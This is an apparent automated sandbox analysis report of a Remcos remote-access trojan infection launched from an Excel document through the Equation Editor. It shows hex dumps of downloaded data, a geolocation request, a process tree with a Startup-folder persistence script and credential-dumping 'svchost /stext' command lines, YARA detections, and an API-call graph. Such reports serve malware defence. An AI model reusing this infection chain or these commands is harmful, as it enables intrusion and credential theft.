                                                                                            May 4, 2024 10:02:38.334496021 CEST1289INData Raw: 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce
                                                                                            Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
                                                                                            May 4, 2024 10:02:38.334521055 CEST1289INData Raw: ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85 c0 0f
                                                                                            Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
                                                                                            May 4, 2024 10:02:38.334533930 CEST1289INData Raw: 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a 01 04
                                                                                            Data Ascii: }u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU
                                                                                            May 4, 2024 10:02:38.334547043 CEST1289INData Raw: 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d c8 88
                                                                                            Data Ascii: uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
                                                                                            May 4, 2024 10:02:38.334561110 CEST1289INData Raw: eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3
                                                                                            Data Ascii: UVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^
                                                                                            May 4, 2024 10:02:38.334574938 CEST1289INData Raw: de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c 01 00
                                                                                            Data Ascii: 9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=g
                                                                                            May 4, 2024 10:02:38.334582090 CEST1289INData Raw: 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00 57 68
                                                                                            Data Ascii: ____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4Z


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249164178.237.33.50801812C:\Windows\SysWOW64\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 4, 2024 10:05:25.452004910 CEST71OUTGET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
                                                                                            May 4, 2024 10:05:25.761215925 CEST1135INHTTP/1.1 200 OK
                                                                                            date: Sat, 04 May 2024 08:05:25 GMT
                                                                                            server: Apache
                                                                                            content-length: 927
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 36 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 [TRUNCATED]
                                                                                            Data Ascii: { "geoplugin_request":"81.181.54.104", "geoplugin_status":206, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"", "geoplugin_region":"", "geoplugin_regionCode":"", "geoplugin_regionName":"", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"RO", "geoplugin_countryName":"Romania", "geoplugin_inEU":1, "geoplugin_euVATrate":19, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"45.9968", "geoplugin_longitude":"24.997", "geoplugin_locationAccuracyRadius":"200", "geoplugin_timezone":"Europe\/Bucharest", "geoplugin_currencyCode":"RON", "geoplugin_currencySymbol":"lei", "geoplugin_currencySymbol_UTF8":"lei", "geoplugin_currencyConverter":4.6208}


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:10:01:47
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x13f610000
                                                                                            File size:28'253'536 bytes
                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:2
                                                                                            Start time:10:02:36
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:10:02:39
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                                                                            Imagebase:0x9f0000
                                                                                            File size:1'369'600 bytes
                                                                                            MD5 hash:FA3641C75D2BEB68C01E8065EEFC4707
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 75%, ReversingLabs
                                                                                            • Detection: 65%, Virustotal, Browse
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:10:05:17
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                                                                            Imagebase:0xd40000
                                                                                            File size:115'664'384 bytes
                                                                                            MD5 hash:B0D8802F1660EDEC8682E3081795E3F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:10:05:18
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\CKK.exe"
                                                                                            Imagebase:0x3f0000
                                                                                            File size:20'992 bytes
                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:10
                                                                                            Start time:10:05:24
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"
                                                                                            Imagebase:0x3f0000
                                                                                            File size:20'992 bytes
                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:10:05:24
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"
                                                                                            Imagebase:0x3f0000
                                                                                            File size:20'992 bytes
                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:10:05:24
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"
                                                                                            Imagebase:0x3f0000
                                                                                            File size:20'992 bytes
                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:10:05:29
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
                                                                                            Imagebase:0xff870000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:10:05:30
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
                                                                                            Imagebase:0x1290000
                                                                                            File size:115'664'384 bytes
                                                                                            MD5 hash:B0D8802F1660EDEC8682E3081795E3F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:10:05:31
                                                                                            Start date:04/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
                                                                                            Imagebase:0x3f0000
                                                                                            File size:20'992 bytes
                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:36.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:78.9%
                                                                                              Total number of Nodes:550
                                                                                              Total number of Limit Nodes:72
                                                                                              execution_graph 1891 3560622 1892 3560625 CreateFileW 1891->1892 1896 3560659 LoadLibraryW 1892->1896 1895 3560649 1931 356066e 1896->1931 1898 35606e6 1901 3560792 1898->1901 1905 3560720 1898->1905 1900 3560662 1915 35606cc 1900->1915 1965 3560692 1900->1965 2111 35607ac 1901->2111 1903 356073b 1904 3560764 1903->1904 2091 356076e 1903->2091 1907 35607f9 1904->1907 1916 3560801 1904->1916 1917 3560769 1904->1917 1918 35607ec WriteFile 1904->1918 1912 3560752 19 API calls 1905->1912 1906 3560683 1997 35606b9 1906->1997 2127 356080d 1907->2127 1912->1903 1913 356069f 1914 3560731 1913->1914 1913->1915 1914->1903 2029 3560752 1914->2029 1915->1898 1915->1903 2066 35606f8 1915->2066 2048 356082a 1916->2048 1917->1895 1918->1904 1921 3560737 1921->1901 1921->1903 1921->1904 1922 356087b 1924 356088a ExitProcess 1922->1924 1930 35608c2 1922->1930 1923 356081a 1923->1922 1926 3560894 1923->1926 2058 356084b 1923->2058 1926->1895 1928 356084a CreateProcessW 2064 3560887 1928->2064 1930->1895 1932 3560671 1931->1932 1933 3560692 37 API calls 1932->1933 1934 3560683 1933->1934 1935 35606b9 34 API calls 1934->1935 1936 356069f 1935->1936 1937 3560731 1936->1937 1938 35606cc 1936->1938 1942 3560752 19 API calls 1937->1942 1954 356073b 1937->1954 1939 35606e6 1938->1939 1940 35606f8 28 API calls 1938->1940 1938->1954 1943 3560792 1939->1943 1946 3560720 1939->1946 1940->1939 1941 356076e 16 API calls 1945 3560764 1941->1945 1944 3560737 1942->1944 1950 35607ac 10 API calls 1943->1950 1944->1943 1944->1945 1944->1954 1947 35607f9 1945->1947 1948 3560769 1945->1948 1952 35607ec WriteFile 1945->1952 1953 3560801 1945->1953 1951 3560752 19 API calls 1946->1951 1949 356080d 7 API calls 1947->1949 1948->1900 1949->1953 1950->1945 1951->1954 1952->1945 1955 356082a 5 API calls 1953->1955 1954->1941 1954->1945 1957 356081a 1955->1957 1956 3560894 1956->1900 1957->1956 1959 356084b 3 API calls 1957->1959 1963 356087b 1957->1963 1958 356088a ExitProcess 1960 356083c 1959->1960 1960->1956 1961 356084a CreateProcessW 1960->1961 1962 3560887 ExitProcess 1961->1962 1962->1963 1963->1958 1964 35608c2 1963->1964 1964->1900 1966 3560695 1965->1966 1967 35606b9 34 API calls 1966->1967 1968 356069f 1967->1968 1969 3560731 1968->1969 1970 35606cc 1968->1970 1971 356073b 1969->1971 1975 3560752 19 API calls 1969->1975 1970->1971 1972 35606e6 1970->1972 1973 35606f8 28 API calls 1970->1973 1974 356076e 16 API calls 1971->1974 1981 3560764 1971->1981 1977 3560792 1972->1977 1978 3560720 1972->1978 1973->1972 1974->1981 1976 3560737 1975->1976 1976->1971 1976->1977 1976->1981 1983 35607ac 10 API calls 1977->1983 1984 3560752 19 API calls 1978->1984 1979 35607f9 1982 356080d 7 API calls 1979->1982 1980 3560769 1980->1906 1981->1979 1981->1980 1985 35607ec WriteFile 1981->1985 1986 3560801 1981->1986 1982->1986 1983->1981 1984->1971 1985->1981 1987 356082a 5 API calls 1986->1987 1989 356081a 1987->1989 1988 356087b 1990 356088a ExitProcess 1988->1990 1996 35608c2 1988->1996 1989->1988 1991 356084b 3 API calls 1989->1991 1992 3560894 1989->1992 1993 356083c 1991->1993 1992->1906 1993->1992 1994 356084a CreateProcessW 1993->1994 1995 3560887 ExitProcess 1994->1995 1995->1988 1996->1906 1998 35606bc 1997->1998 2139 35606d5 1998->2139 2000 35606c2 2001 35606cc 2000->2001 2002 3560731 2000->2002 2003 35606e6 2001->2003 2004 35606f8 28 API calls 2001->2004 2005 356073b 2001->2005 2002->2005 2007 3560752 19 API calls 2002->2007 2008 3560792 2003->2008 2011 3560720 2003->2011 2004->2003 2006 356076e 16 API calls 2005->2006 2010 3560764 2005->2010 2006->2010 2009 3560737 2007->2009 2015 35607ac 10 API calls 2008->2015 2009->2005 2009->2008 2009->2010 2012 35607f9 2010->2012 2013 3560769 2010->2013 2017 35607ec WriteFile 2010->2017 2018 3560801 2010->2018 2016 3560752 19 API calls 2011->2016 2014 356080d 7 API calls 2012->2014 2013->1913 2014->2018 2015->2010 2016->2005 2017->2010 2019 356082a 5 API calls 2018->2019 2020 356081a 2019->2020 2022 356084b 3 API calls 2020->2022 2023 3560894 2020->2023 2027 356087b 2020->2027 2021 356088a ExitProcess 2024 356083c 2022->2024 2023->1913 2024->2023 2025 356084a CreateProcessW 2024->2025 2026 3560887 ExitProcess 2025->2026 2026->2027 2027->2021 2028 35608c2 2027->2028 2028->1913 2030 3560755 2029->2030 2031 356076e 16 API calls 2030->2031 2034 3560764 2031->2034 2032 3560769 2032->1921 2033 35607ec WriteFile 2033->2034 2034->2032 2034->2033 2035 35607f9 2034->2035 2036 356080d 7 API calls 2035->2036 2037 3560801 2036->2037 2038 356082a 5 API calls 2037->2038 2039 356081a 2038->2039 2040 3560894 2039->2040 2042 356084b 3 API calls 2039->2042 2046 356087b 2039->2046 2040->1921 2041 356088a ExitProcess 2043 356083c 2042->2043 2043->2040 2044 356084a CreateProcessW 2043->2044 2045 3560887 ExitProcess 2044->2045 2045->2046 2046->2041 2047 35608c2 2046->2047 2047->1921 2049 356082d 2048->2049 2050 356084b 3 API calls 2049->2050 2051 356083c 2050->2051 2052 356089c 2051->2052 2053 356084a CreateProcessW 2051->2053 2052->1923 2054 3560887 ExitProcess 2053->2054 2055 356087b 2054->2055 2056 35608c2 2055->2056 2057 356088a ExitProcess 2055->2057 2056->1923 2059 356084e CreateProcessW 2058->2059 2060 3560887 ExitProcess 2059->2060 2061 356087b 2059->2061 2060->2061 2062 356083c 2061->2062 2063 356088a ExitProcess 2061->2063 2062->1926 2062->1928 2065 356088a ExitProcess 2064->2065 2165 3560705 2066->2165 2068 35606fd 2069 3560792 2068->2069 2070 3560720 2068->2070 2071 35607ac 10 API calls 2069->2071 2072 3560752 19 API calls 2070->2072 2078 3560764 2071->2078 2073 356073b 2072->2073 2076 356076e 16 API calls 2073->2076 2073->2078 2074 356082a 5 API calls 2079 356081a 2074->2079 2075 35607f9 2077 356080d 7 API calls 2075->2077 2076->2078 2080 3560801 2077->2080 2078->2075 2078->2080 2081 3560769 2078->2081 2083 35607ec WriteFile 2078->2083 2084 356084b 3 API calls 2079->2084 2085 3560894 2079->2085 2089 356087b 2079->2089 2080->2074 2081->1898 2082 356088a ExitProcess 2083->2078 2086 356083c 2084->2086 2085->1898 2086->2085 2087 356084a CreateProcessW 2086->2087 2088 3560887 ExitProcess 2087->2088 2088->2089 2089->2082 2090 35608c2 2089->2090 2090->1898 2092 3560771 2091->2092 2212 3560792 2092->2212 2094 35607ec WriteFile 2100 356079c 2094->2100 2095 3560778 2095->2094 2096 35607ac 10 API calls 2095->2096 2097 35607fd 2095->2097 2095->2100 2096->2100 2098 356082a 5 API calls 2097->2098 2103 356081a 2098->2103 2099 35607f9 2101 356080d 7 API calls 2099->2101 2100->2094 2100->2097 2100->2099 2101->2097 2102 356087b 2104 356088a ExitProcess 2102->2104 2110 35608c2 2102->2110 2103->2102 2105 356084b 3 API calls 2103->2105 2106 3560894 2103->2106 2107 356083c 2105->2107 2106->1904 2107->2106 2108 356084a CreateProcessW 2107->2108 2109 3560887 ExitProcess 2108->2109 2109->2102 2110->1904 2114 35607af 2111->2114 2112 35607f9 2113 356080d 7 API calls 2112->2113 2116 3560801 2113->2116 2114->2112 2115 35607ec WriteFile 2114->2115 2115->2114 2117 356082a 5 API calls 2116->2117 2118 356081a 2117->2118 2120 356084b 3 API calls 2118->2120 2121 3560894 2118->2121 2125 356087b 2118->2125 2119 356088a ExitProcess 2122 356083c 2120->2122 2121->1904 2122->2121 2123 356084a CreateProcessW 2122->2123 2124 3560887 ExitProcess 2123->2124 2124->2125 2125->2119 2126 35608c2 2125->2126 2126->1904 2128 3560810 2127->2128 2129 356082a 5 API calls 2128->2129 2130 356081a 2129->2130 2132 356084b 3 API calls 2130->2132 2133 3560894 2130->2133 2137 356087b 2130->2137 2131 356088a ExitProcess 2134 356083c 2132->2134 2133->1916 2134->2133 2135 356084a CreateProcessW 2134->2135 2136 3560887 ExitProcess 2135->2136 2136->2137 2137->2131 2138 35608c2 2137->2138 2138->1916 2140 35606d8 2139->2140 2141 35606f8 28 API calls 2140->2141 2142 35606e6 2141->2142 2143 3560792 2142->2143 2144 3560720 2142->2144 2145 35607ac 10 API calls 2143->2145 2146 3560752 19 API calls 2144->2146 2152 3560764 2145->2152 2147 356073b 2146->2147 2150 356076e 16 API calls 2147->2150 2147->2152 2148 356082a 5 API calls 2153 356081a 2148->2153 2149 35607f9 2151 356080d 7 API calls 2149->2151 2150->2152 2154 3560801 2151->2154 2152->2149 2152->2154 2155 3560769 2152->2155 2157 35607ec WriteFile 2152->2157 2158 356084b 3 API calls 2153->2158 2159 3560894 2153->2159 2163 356087b 2153->2163 2154->2148 2155->2000 2156 356088a ExitProcess 2157->2152 2160 356083c 2158->2160 2159->2000 2160->2159 2161 356084a CreateProcessW 2160->2161 2162 3560887 ExitProcess 2161->2162 2162->2163 2163->2156 2164 35608c2 2163->2164 2164->2000 2166 3560708 2165->2166 2191 3560721 2166->2191 2168 356070e 2169 3560792 2168->2169 2170 3560720 2168->2170 2171 35607ac 10 API calls 2169->2171 2172 3560752 19 API calls 2170->2172 2174 3560764 2171->2174 2175 356073b 2172->2175 2173 3560801 2176 356082a 5 API calls 2173->2176 2174->2173 2178 35607f9 2174->2178 2181 3560769 2174->2181 2183 35607ec WriteFile 2174->2183 2175->2174 2179 356076e 16 API calls 2175->2179 2177 356081a 2176->2177 2184 356084b 3 API calls 2177->2184 2185 3560894 2177->2185 2189 356087b 2177->2189 2180 356080d 7 API calls 2178->2180 2179->2174 2180->2173 2181->2068 2182 356088a ExitProcess 2183->2174 2186 356083c 2184->2186 2185->2068 2186->2185 2187 356084a CreateProcessW 2186->2187 2188 3560887 ExitProcess 2187->2188 2188->2189 2189->2182 2190 35608c2 2189->2190 2190->2068 2192 3560724 2191->2192 2193 3560752 19 API calls 2192->2193 2194 356073b 2193->2194 2195 3560764 2194->2195 2197 356076e 16 API calls 2194->2197 2196 35607f9 2195->2196 2199 3560769 2195->2199 2201 35607ec WriteFile 2195->2201 2198 356080d 7 API calls 2196->2198 2197->2195 2200 3560801 2198->2200 2199->2168 2202 356082a 5 API calls 2200->2202 2201->2195 2203 356081a 2202->2203 2205 356084b 3 API calls 2203->2205 2206 3560894 2203->2206 2210 356087b 2203->2210 2204 356088a ExitProcess 2207 356083c 2205->2207 2206->2168 2207->2206 2208 356084a CreateProcessW 2207->2208 2209 3560887 ExitProcess 2208->2209 2209->2210 2210->2204 2211 35608c2 2210->2211 2211->2168 2213 3560795 